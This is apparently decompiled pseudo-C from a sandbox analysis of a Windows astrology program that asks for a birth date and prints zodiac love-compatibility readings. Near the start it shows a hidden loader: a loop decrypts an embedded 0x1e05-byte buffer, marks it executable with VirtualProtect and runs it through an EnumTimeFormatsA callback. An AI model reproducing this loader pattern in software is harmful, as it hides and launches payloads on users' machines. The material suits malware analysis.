																																																								__eflags = __eax - 0x3d7dca01;
																																																								 *__edi = __edx +  *__edi;
																																																								__eflags =  *__edi;
																																																								if( *__edi <= 0) {
																																																									L400:
																																																									__al = __al + 0xf0;
																																																									 *[ds:ebp+0x6a51fc4d] =  *[ds:ebp+0x6a51fc4d] + __ecx;
																																																									__edx[0] = __edx[0] + __ch;
																																																									_push(0);
																																																									_push(2);
																																																									_push(0); // executed
																																																									__eax =  *__eax(); // executed
																																																									__eflags = __eax;
																																																									if(__eflags != 0) {
																																																										__eflags = __eax - 0x57;
																																																										L402:
																																																										_push(__edi);
																																																										if(__eflags == 0) {
																																																											__eax = 0;
																																																											__eflags = 0;
																																																											L404:
																																																											_t973 = 0x13fb408 + __eax; // 0x170ce9
																																																											 *_t973 =  *_t973 + __al;
																																																											 ~( *_t973 + __al) =  ~( *_t973 + __al) ^ 0x00000028;
																																																											0xd2 = 0xd2 - ( ~( *_t973 + __al) ^ 0x00000028);
																																																											0x000000d2 - ( ~( *_t973 + __al) ^ 0x00000028) ^ __al = (0x000000d2 - ( ~( *_t973 + __al) ^ 0x00000028) ^ __al) - __al;
																																																											__cl =  !((0x000000d2 - ( ~( *_t973 + __al) ^ 0x00000028) ^ __al) - __al);
																																																											__cl =  !((0x000000d2 - ( ~( *_t973 + __al) ^ 0x00000028) ^ __al) - __al) + 0x7e;
																																																											asm("ror cl, 0x2");
																																																											L405:
																																																											__esp = __ebp;
																																																											_pop(__ebp);
																																																											__cl = __cl +  *((intOrPtr*)(__eax + 0x3fb40888));
																																																											_t975 = 0x3d + __eax;
																																																											 *_t975 =  *(0x3d + __eax) + __eax;
																																																											__eflags =  *_t975;
																																																											L406:
																																																											__eax = 1 + __eax;
																																																											__eflags = __eax - 0x1e05;
																																																											if(__eflags < 0) {
																																																												goto L404;
																																																											}
																																																											__edx =  &_v48;
																																																											__eax = VirtualProtect(0x13fb408, 0x1e05, 0x40, __edx); // executed
																																																											__eax = EnumTimeFormatsA(0x13fb408, 0, 0); // executed
																																																										}
																																																									}
																																																								} else {
																																																									 *((intOrPtr*)(__ecx + 0x7e)) =  *((intOrPtr*)(__ecx + 0x7e)) + __esp;
																																																									__eflags = __eax - 0xcccccc01;
																																																									goto L387;
																																																								}
																																																							}
																																																						}
																																																					}
																																																				}
																																																			}
																																																		}
																																																	}
																																																}
																																																_push(__esi);
																																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																																_push("just enter your date of birth");
																																																 *0x13fe250 = 0x12002d;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																_push("YEAR: ");
																																																 *0x13fe250 = 0x13002d;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__ecx =  &_v72;
																																																__eax = E013DB060("%d",  &_v72);
																																																_push("MONTH: ");
																																																 *0x13fe250 = 0x14002d;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__ecx =  &_v68;
																																																__eax = E013DB060("%d",  &_v68);
																																																_push("DAY: ");
																																																 *0x13fe250 = 0x15002d;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__ecx =  &_v64;
																																																__eax = E013DB060("%d",  &_v64);
																																																_push(E013DB07D());
																																																__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																																																__eax = _v68;
																																																__esp = 0x30 + __esp;
																																																__eflags = __eax - 0xc;
																																																if(__eflags > 0) {
																																																	L415:
																																																	__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																																	_push("THE ENTRY YOU MADE WAS WRONG.....");
																																																	 *0x13fe250 = 0xa001e;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	_push("PLEASE ENTER CORRECT DATE OF BIRTH ACCORDING TO GREGORIAN CALENDAR");
																																																	 *0x13fe250 = 0xb000a;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	_push("just enter your date of birth");
																																																	 *0x13fe250 = 0x12002d;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	_push("YEAR: ");
																																																	 *0x13fe250 = 0x13002d;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	__ecx =  &_v72;
																																																	__eax = E013DB060("%d",  &_v72);
																																																	_push("MONTH: ");
																																																	 *0x13fe250 = 0x14002d;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	__ecx =  &_v68;
																																																	__eax = E013DB060("%d",  &_v68);
																																																	_push("DAY: ");
																																																	 *0x13fe250 = 0x15002d;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	__ecx =  &_v64;
																																																	__eax = E013DB060("%d",  &_v64);
																																																	_push(E013DB07D());
																																																	__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																																																	__ecx = _v64;
																																																	__eax = _v68;
																																																	__edx = _v72;
																																																	__esp = 0x38 + __esp;
																																																} else {
																																																	__ecx = _v64;
																																																	__eflags = __eax - 2;
																																																	if(__eax != 2) {
																																																		L411:
																																																		__eflags = __ecx - 0x1f;
																																																		if(__eflags > 0) {
																																																			goto L415;
																																																		} else {
																																																			__eflags = __ecx - 0x1e;
																																																			if(__eflags > 0) {
																																																				goto L415;
																																																			} else {
																																																				__edx = _v72;
																																																				__esi = 0x7da;
																																																				__esi = 0x7da - __edx;
																																																				__eflags = 0x7da - 0x64;
																																																				if(0x7da > 0x64) {
																																																					goto L415;
																																																				} else {
																																																					__eflags = __edx - 0x7da;
																																																					if(__eflags > 0) {
																																																						goto L415;
																																																					}
																																																				}
																																																			}
																																																		}
																																																	} else {
																																																		__eflags = __ecx - 0x1e;
																																																		if(__eflags >= 0) {
																																																			goto L415;
																																																		} else {
																																																			goto L411;
																																																		}
																																																	}
																																																}
																																																__eflags = __eax - 0xc;
																																																if(__eflags > 0) {
																																																	L423:
																																																	_push("WRONG ENTRY");
																																																	 *0x13fe250 = 0x16002d;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	_push(3);
																																																	_push("THE PROGRAM RESTARTS IN %d SECONDS");
																																																	 *0x13fe250 = 0x170026;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	_push(2);
																																																	_push("THE PROGRAM RESTARTS IN %d SECONDS");
																																																	 *0x13fe250 = 0x170026;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	_push(1);
																																																	_push("THE PROGRAM RESTARTS IN %d SECONDS");
																																																	 *0x13fe250 = 0x170026;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	_push(0);
																																																	_push("THE PROGRAM RESTARTS IN %d SECONDS");
																																																	 *0x13fe250 = 0x170026;
																																																	__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																	__esp = 0x24 + __esp;
																																																	__eax =  *0x13d0000();
																																																	__ecx = _v64;
																																																	__eax = _v68;
																																																	__edx = _v72;
																																																} else {
																																																	__eflags = __eax - 2;
																																																	if(__eax != 2) {
																																																		L419:
																																																		__eflags = __ecx - 0x1f;
																																																		if(__eflags > 0) {
																																																			goto L423;
																																																		} else {
																																																			__eflags = __ecx - 0x1e;
																																																			if(__eflags > 0) {
																																																				goto L423;
																																																			} else {
																																																				__esi = 0x7da;
																																																				__esi = 0x7da - __edx;
																																																				__eflags = 0x7da - 0x64;
																																																				if(0x7da > 0x64) {
																																																					goto L423;
																																																				} else {
																																																					__eflags = __edx - 0x7da;
																																																					if(__eflags > 0) {
																																																						goto L423;
																																																					}
																																																				}
																																																			}
																																																		}
																																																	} else {
																																																		__eflags = __ecx - 0x1e;
																																																		if(__eflags >= 0) {
																																																			goto L423;
																																																		} else {
																																																			goto L419;
																																																		}
																																																	}
																																																}
																																																 *0x13fe244 = __edx;
																																																 *0x13fe248 = __eax;
																																																 *0x13fe24c = __ecx;
																																																__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																																_push("REGISTRY DETAILS");
																																																 *0x13fe250 = 0x5000c;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																_push("------------------------------------------------------------------");
																																																 *0x13fe250 = 0x6000c;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																_push("------------------------------------------------------------------");
																																																 *0x13fe250 = 0x9000c;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																_push("Enter Full Name:  ");
																																																 *0x13fe250 = 0x70011;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																_push(E013DB07D());
																																																__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																																																_push("Enter Sex:  ");
																																																 *0x13fe250 = 0x80011;
																																																E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = E013DC5B8();
																																																_push("press any key to continue.....");
																																																 *0x13fe242 = __al;
																																																 *0x13fe250 = 0x170032;
																																																E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = E013EDBFD(__ebx, __edi, __esi, __eflags);
																																																__eax = E013DBB6E("records.txt", 0x13f7b64);
																																																_pop(__esi);
																																																__eflags = __eax;
																																																if(__eflags == 0) {
																																																	__eax = E013DC543(__eax);
																																																}
																																																_push(__eax);
																																																_push(1);
																																																_push(0x40);
																																																_push(0x13fe210);
																																																__eax = E013DBF81(__ebx, __edx, __edi, __esi, __eflags);
																																																__eax = _v68;
																																																__esp = 0x10 + __esp;
																																																__eflags = __eax - 3;
																																																if(__eax != 3) {
																																																	__eflags = __eax - 4;
																																																	if(__eax != 4) {
																																																		goto L435;
																																																	} else {
																																																		__eax = _v64;
																																																		__eflags = __eax - 0x13;
																																																		if(__eflags > 0) {
																																																			goto L433;
																																																		} else {
																																																			goto L431;
																																																		}
																																																	}
																																																} else {
																																																	__eax = _v64;
																																																	__eflags = __eax - 0x15;
																																																	if(__eflags >= 0) {
																																																		L431:
																																																		__ecx =  *0x13fe242 & 0x000000ff;
																																																		__edx = _v72;
																																																		_push(__ecx);
																																																		_push(0x13fe210);
																																																		_push(_v72);
																																																		_push(__eax);
																																																		__eax = E013D2710(__ebx, __ecx, __edi, __esi, __eflags);
																																																		__eax = _v68;
																																																		__esp = 0x10 + __esp;
																																																		__eflags = __eax - 4;
																																																		if(__eax != 4) {
																																																			L435:
																																																			__eflags = __eax - 5;
																																																			if(__eax != 5) {
																																																				goto L441;
																																																			} else {
																																																				__eax = _v64;
																																																				__eflags = __eax - 0x14;
																																																				if(__eflags > 0) {
																																																					goto L439;
																																																				} else {
																																																					goto L437;
																																																				}
																																																			}
																																																		} else {
																																																			__eax = _v64;
																																																			L433:
																																																			__eflags = __eax - 0x14;
																																																			if(__eflags >= 0) {
																																																				L437:
																																																				__ecx =  *0x13fe242 & 0x000000ff;
																																																				__edx = _v72;
																																																				__eax = E013D2E50(__ebx,  *0x13fe242 & 0x000000ff, __edi, __esi, __eflags, __eax, _v72, 0x13fe210,  *0x13fe242 & 0x000000ff);
																																																				__eax = _v68;
																																																				__esp = 0x10 + __esp;
																																																				__eflags = __eax - 5;
																																																				if(__eax != 5) {
																																																					L441:
																																																					__eflags = __eax - 6;
																																																					if(__eax != 6) {
																																																						goto L447;
																																																					} else {
																																																						__eax = _v64;
																																																						__eflags = __eax - 0x14;
																																																						if(__eax > 0x14) {
																																																							goto L445;
																																																						} else {
																																																							goto L443;
																																																						}
																																																					}
																																																				} else {
																																																					__eax = _v64;
																																																					L439:
																																																					__eflags = __eax - 0x15;
																																																					if(__eax >= 0x15) {
																																																						L443:
																																																						__ecx =  *0x13fe242 & 0x000000ff;
																																																						__edx = _v72;
																																																						_push( *0x13fe242 & 0x000000ff);
																																																						_push(0x13fe210);
																																																						_push(_v72);
																																																						_push(__eax);
																																																						L31();
																																																						__eax = _v68;
																																																						__esp = 0x10 + __esp;
																																																						__eflags = __eax - 6;
																																																						if(__eax != 6) {
																																																							L447:
																																																							__eflags = __eax - 7;
																																																							if(__eax != 7) {
																																																								goto L453;
																																																							} else {
																																																								__eax = _v64;
																																																								__eflags = __eax - 0x16;
																																																								if(__eax > 0x16) {
																																																									goto L451;
																																																								} else {
																																																									goto L449;
																																																								}
																																																							}
																																																						} else {
																																																							__eax = _v64;
																																																							L445:
																																																							__eflags = __eax - 0x15;
																																																							if(__eax >= 0x15) {
																																																								L449:
																																																								__ecx =  *0x13fe242 & 0x000000ff;
																																																								__edx = _v72;
																																																								_push( *0x13fe242 & 0x000000ff);
																																																								_push(0x13fe210);
																																																								_push(_v72);
																																																								_push(__eax);
																																																								L64();
																																																								__eax = _v68;
																																																								__esp = 0x10 + __esp;
																																																								__eflags = __eax - 7;
																																																								if(__eax != 7) {
																																																									L453:
																																																									__eflags = __eax - 8;
																																																									if(__eax != 8) {
																																																										goto L459;
																																																									} else {
																																																										__eax = _v64;
																																																										__eflags = __eax - 0x16;
																																																										if(__eax > 0x16) {
																																																											goto L457;
																																																										} else {
																																																											goto L455;
																																																										}
																																																									}
																																																								} else {
																																																									__eax = _v64;
																																																									L451:
																																																									__eflags = __eax - 0x17;
																																																									if(__eax >= 0x17) {
																																																										L455:
																																																										__ecx =  *0x13fe242 & 0x000000ff;
																																																										__edx = _v72;
																																																										_push( *0x13fe242 & 0x000000ff);
																																																										_push(0x13fe210);
																																																										_push(_v72);
																																																										_push(__eax);
																																																										L97();
																																																										__eax = _v68;
																																																										__esp = 0x10 + __esp;
																																																										__eflags = __eax - 8;
																																																										if(__eax != 8) {
																																																											L459:
																																																											__eflags = __eax - 9;
																																																											if(__eax != 9) {
																																																												goto L465;
																																																											} else {
																																																												__eax = _v64;
																																																												__eflags = __eax - 0x16;
																																																												if(__eax > 0x16) {
																																																													goto L463;
																																																												} else {
																																																													goto L461;
																																																												}
																																																											}
																																																										} else {
																																																											__eax = _v64;
																																																											L457:
																																																											__eflags = __eax - 0x17;
																																																											if(__eax >= 0x17) {
																																																												L461:
																																																												__ecx =  *0x13fe242 & 0x000000ff;
																																																												__edx = _v72;
																																																												_push( *0x13fe242 & 0x000000ff);
																																																												_push(0x13fe210);
																																																												_push(_v72);
																																																												_push(__eax);
																																																												L131();
																																																												__eax = _v68;
																																																												__esp = 0x10 + __esp;
																																																												__eflags = __eax - 9;
																																																												if(__eax != 9) {
																																																													L465:
																																																													__eflags = __eax - 0xa;
																																																													if(__eax != 0xa) {
																																																														goto L471;
																																																													} else {
																																																														__eax = _v64;
																																																														__eflags = __eax - 0x16;
																																																														if(__eax > 0x16) {
																																																															goto L469;
																																																														} else {
																																																															goto L467;
																																																														}
																																																													}
																																																												} else {
																																																													__eax = _v64;
																																																													L463:
																																																													__eflags = __eax - 0x17;
																																																													if(__eax >= 0x17) {
																																																														L467:
																																																														__ecx =  *0x13fe242 & 0x000000ff;
																																																														__edx = _v72;
																																																														_push( *0x13fe242 & 0x000000ff);
																																																														_push(0x13fe210);
																																																														_push(_v72);
																																																														_push(__eax);
																																																														L164();
																																																														__eax = _v68;
																																																														__esp = 0x10 + __esp;
																																																														__eflags = __eax - 0xa;
																																																														if(__eax != 0xa) {
																																																															L471:
																																																															__eflags = __eax - 0xb;
																																																															if(__eax != 0xb) {
																																																																goto L477;
																																																															} else {
																																																																__eax = _v64;
																																																																__eflags = __eax - 0x15;
																																																																if(__eax > 0x15) {
																																																																	goto L475;
																																																																} else {
																																																																	goto L473;
																																																																}
																																																															}
																																																														} else {
																																																															__eax = _v64;
																																																															L469:
																																																															__eflags = __eax - 0x17;
																																																															if(__eax >= 0x17) {
																																																																L473:
																																																																__ecx =  *0x13fe242 & 0x000000ff;
																																																																__edx = _v72;
																																																																_push( *0x13fe242 & 0x000000ff);
																																																																_push(0x13fe210);
																																																																_push(_v72);
																																																																_push(__eax);
																																																																L199();
																																																																__eax = _v68;
																																																																__esp = 0x10 + __esp;
																																																																__eflags = __eax - 0xb;
																																																																if(__eax != 0xb) {
																																																																	L477:
																																																																	__eflags = __eax - 0xc;
																																																																	if(__eax != 0xc) {
																																																																		goto L483;
																																																																	} else {
																																																																		__eax = _v64;
																																																																		__eflags = __eax - 0x15;
																																																																		if(__eax > 0x15) {
																																																																			goto L481;
																																																																		} else {
																																																																			goto L479;
																																																																		}
																																																																	}
																																																																} else {
																																																																	__eax = _v64;
																																																																	L475:
																																																																	__eflags = __eax - 0x16;
																																																																	if(__eax >= 0x16) {
																																																																		L479:
																																																																		__ecx =  *0x13fe242 & 0x000000ff;
																																																																		__edx = _v72;
																																																																		_push( *0x13fe242 & 0x000000ff);
																																																																		_push(0x13fe210);
																																																																		_push(_v72);
																																																																		_push(__eax);
																																																																		L230();
																																																																		__eax = _v68;
																																																																		__esp = 0x10 + __esp;
																																																																		__eflags = __eax - 0xc;
																																																																		if(__eax != 0xc) {
																																																																			L483:
																																																																			__eflags = __eax - 1;
																																																																			if(__eax != 1) {
																																																																				goto L489;
																																																																			} else {
																																																																				__eax = _v64;
																																																																				__eflags = __eax - 0x13;
																																																																				if(__eax > 0x13) {
																																																																					goto L487;
																																																																				} else {
																																																																					goto L485;
																																																																				}
																																																																			}
																																																																		} else {
																																																																			__eax = _v64;
																																																																			L481:
																																																																			__eflags = __eax - 0x16;
																																																																			if(__eax >= 0x16) {
																																																																				L485:
																																																																				__ecx =  *0x13fe242 & 0x000000ff;
																																																																				__edx = _v72;
																																																																				_push( *0x13fe242 & 0x000000ff);
																																																																				_push(0x13fe210);
																																																																				_push(_v72);
																																																																				_push(__eax);
																																																																				L261();
																																																																				__eax = _v68;
																																																																				__esp = 0x10 + __esp;
																																																																				__eflags = __eax - 1;
																																																																				if(__eax != 1) {
																																																																					L489:
																																																																					__eflags = __eax - 2;
																																																																					if(__eax != 2) {
																																																																						goto L495;
																																																																					} else {
																																																																						__eax = _v64;
																																																																						__eflags = __eax - 0x12;
																																																																						if(__eax > 0x12) {
																																																																							goto L493;
																																																																						} else {
																																																																							goto L491;
																																																																						}
																																																																					}
																																																																				} else {
																																																																					__eax = _v64;
																																																																					L487:
																																																																					__eflags = __eax - 0x14;
																																																																					if(__eax >= 0x14) {
																																																																						L491:
																																																																						__ecx =  *0x13fe242 & 0x000000ff;
																																																																						__edx = _v72;
																																																																						_push( *0x13fe242 & 0x000000ff);
																																																																						_push(0x13fe210);
																																																																						_push(_v72);
																																																																						_push(__eax);
																																																																						L294();
																																																																						__eax = _v68;
																																																																						__esp = 0x10 + __esp;
																																																																						__eflags = __eax - 2;
																																																																						if(__eax != 2) {
																																																																							L495:
																																																																							__eflags = __eax - 3;
																																																																							if(__eax == 3) {
																																																																								__eax = _v64;
																																																																								goto L497;
																																																																							}
																																																																							goto L499;
																																																																						} else {
																																																																							__eax = _v64;
																																																																							L493:
																																																																							__eflags = __eax - 0x13;
																																																																							if(__eax >= 0x13) {
																																																																								goto L498;
																																																																							} else {
																																																																								__eax = 0;
																																																																								__eflags = 0;
																																																																								return 0;
																																																																							}
																																																																						}
																																																																					} else {
																																																																						__eax = 0;
																																																																						__eflags = 0;
																																																																						return 0;
																																																																					}
																																																																				}
																																																																			} else {
																																																																				__eax = 0;
																																																																				__eflags = 0;
																																																																				return 0;
																																																																			}
																																																																		}
																																																																	} else {
																																																																		__eax = 0;
																																																																		__eflags = 0;
																																																																		return 0;
																																																																	}
																																																																}
																																																															} else {
																																																																__eax = 0;
																																																																__eflags = 0;
																																																																return 0;
																																																															}
																																																														}
																																																													} else {
																																																														__eax = 0;
																																																														__eflags = 0;
																																																														return 0;
																																																													}
																																																												}
																																																											} else {
																																																												__eax = 0;
																																																												__eflags = 0;
																																																												return 0;
																																																											}
																																																										}
																																																									} else {
																																																										__eax = 0;
																																																										__eflags = 0;
																																																										return 0;
																																																									}
																																																								}
																																																							} else {
																																																								__eax = 0;
																																																								__eflags = 0;
																																																								return 0;
																																																							}
																																																						}
																																																					} else {
																																																						__eax = 0;
																																																						__eflags = 0;
																																																						return 0;
																																																					}
																																																				}
																																																			} else {
																																																				__eax = 0;
																																																				__eflags = 0;
																																																				return 0;
																																																			}
																																																		}
																																																	} else {
																																																		L497:
																																																		__eflags = __eax - 0x14;
																																																		if(__eax <= 0x14) {
																																																			L498:
																																																			__ecx =  *0x13fe242 & 0x000000ff;
																																																			__edx = _v72;
																																																			_push( *0x13fe242 & 0x000000ff);
																																																			_push(0x13fe210);
																																																			_push(_v72);
																																																			_push(__eax);
																																																			L336();
																																																			__esp = 0x10 + __esp;
																																																		}
																																																		L499:
																																																		__eax = 0;
																																																		__eflags = 0;
																																																		return 0;
																																																	}
																																																}
																																																goto L500;
																																															case 6:
																																																L359:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__eax = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND ARIES LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0xb;
																																																E013D1B90(__ebx, 0xb, __edi) = _v16;
																																																_push(_v16);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 7:
																																																L360:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__ecx = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND TAURUS LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x16;
																																																__eax = E013D1B90(__ebx, 0x16, __edi);
																																																__ecx = _v16;
																																																_push(_v16);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 8:
																																																L361:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__edx = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND GEMINI LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x21;
																																																__eax = E013D1B90(__ebx, 0x21, __edi);
																																																__edx = _v16;
																																																_push(__edx);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 9:
																																																L362:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__eax = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND CANCER LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x29;
																																																E013D1B90(__ebx, 0x29, __edi) = _v16;
																																																_push(_v16);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 0xa:
																																																L363:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__ecx = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND LEO LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x31;
																																																__eax = E013D1B90(__ebx, 0x31, __edi);
																																																__ecx = _v16;
																																																_push(_v16);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 0xb:
																																																L364:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__edx = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND VIRGO LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x38;
																																																__eax = E013D1B90(__ebx, 0x38, __edi);
																																																__edx = _v16;
																																																_push(__edx);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 0xc:
																																																L365:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__eax = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND LIBRA LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x3e;
																																																E013D1B90(__ebx, 0x3e, __edi) = _v16;
																																																_push(_v16);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 0xd:
																																																L366:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__ecx = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND SCORPIO LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x43;
																																																__eax = E013D1B90(__ebx, 0x43, __edi);
																																																__ecx = _v16;
																																																_push(_v16);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 0xe:
																																																L367:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__edx = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND SAGGITARIUS LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x47;
																																																__eax = E013D1B90(__ebx, 0x47, __edi);
																																																__edx = _v16;
																																																_push(__edx);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 0xf:
																																																L368:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__eax = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND CAPRICORN LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x4a;
																																																E013D1B90(__ebx, 0x4a, __edi) = _v16;
																																																_push(_v16);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 0x10:
																																																L369:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__ecx = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND AQUARIUS LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x4c;
																																																__eax = E013D1B90(__ebx, 0x4c, __edi);
																																																__ecx = _v16;
																																																_push(_v16);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																															case 0x11:
																																																L370:
																																																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
																																																__edx = _v16;
																																																__edx = __edi;
																																																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v16, __ebx);
																																																_push("PISCES AND PISCES LOVE COMPATIBILITY");
																																																 *0x13fe250 = 0x80005;
																																																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																																__edx = 0x4d;
																																																__eax = E013D1B90(__ebx, 0x4d, __edi);
																																																__edx = _v16;
																																																_push(__edx);
																																																_push(__edi);
																																																_push(__ebx);
																																																_push(__esi);
																																																L336();
																																																__esp = 0x20 + __esp;
																																																goto L372;
																																														}
																																														L372:
																																														__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																																														_push(__edi);
																																														_push("Name: %s");
																																														 *0x13fe250 = 0x30037;
																																														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																														__ecx = _v52;
																																														_push(_v52);
																																														_push("Age=%d");
																																														 *0x13fe250 = 0x40037;
																																														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																														__ecx = _v56;
																																														 *0x13fe250 = 0x50037;
																																														_push(E013DC111(_v56));
																																														_push("Sex=%c");
																																														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																																														__esp = 0x20 + __esp;
																																														__eax = E013D1B10();
																																														_v68 = "\n*  You are kind and gullible.";
																																														_v64 = "\n*  You cannot hurt anyone directly.";
																																														_v60 = "\n*  You are adventurous, ambitious, impulsive, enthusiastic and full of energy.";
